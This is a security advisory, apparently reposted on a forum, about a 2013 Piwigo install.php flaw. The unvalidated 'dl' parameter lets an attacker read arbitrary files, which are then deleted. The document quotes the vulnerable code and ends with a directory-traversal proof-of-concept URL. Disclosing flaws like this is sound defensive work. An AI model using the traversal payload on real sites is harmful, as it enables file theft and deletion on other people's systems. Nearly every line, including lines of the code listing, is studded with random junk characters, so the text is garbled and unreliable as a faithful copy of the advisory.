Piwigo任意文件泄露和任意文件删除漏洞

admin

Piwigo是用PHP编写的相册脚本。
& F3 I4 W  X: h6 z2 G: `: J7 R
+ \" }, s- m7 W! M  B9 w9 JPiwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值，在实现上存在安全漏洞，攻击者可利用这些漏洞查看受影响计算机上的任意文件，删除受影响应用上下文内的任意文件。
====================================================================
3 A; E( M0 \; ~9 v  u4 b  Y0 [/install.php:
-------------
( @1 H6 o6 n+ }$ M113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
' G8 Y+ y0 v' ^! f114: {
' [6 M. m/ i. n* M) u115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
116:   header('Cache-Control: no-cache, must-revalidate');
& ?/ j  i$ J6 ?. q. P117:   header('Pragma: no-cache');
118:   header('Content-Disposition: attachment; filename="database.inc.php"');
; f1 t1 i6 b) ^& J2 z119:   header('Content-Transfer-Encoding: binary');
$ Z2 j% x9 F6 |4 J1 G$ P120:   header('Content-Length: '.filesize($filename));
121:   echo file_get_contents($filename);
5 G& A# N* I$ ?4 Z8 J( \122:   unlink($filename);
123:   exit();
124: }
====================================================================
$ `; m- g/ q; M6 N- n7 b% x
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
" \8 j6 X6 V7 T4 {" E5 O           PHP 5.4.4
1 Y' s% Q3 T+ U& q           MySQL 5.5.25a
, f$ z6 A# g  `9 E8 h! L$ R9 n
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
) ]- z- k$ X3 c- A                            @zeroscience
' ~* x3 R" b% @/ q0 x& B8 j* y
2 d0 L# e9 L. _Advisory ID: ZSL-2013-5127
, N* K  X) U/ @6 X# M7 u. TAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
( U" H( M) Z: X% m3 kVendor Patch: http://piwigo.org/bugs/view.php?id=2843
7 `& v1 {& `' G" e  X2 ^2 G
15.02.2013

! y1 G# t/ E9 r# O--
$ e" ?* i/ U9 ]* P* L9 I6 khttp://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt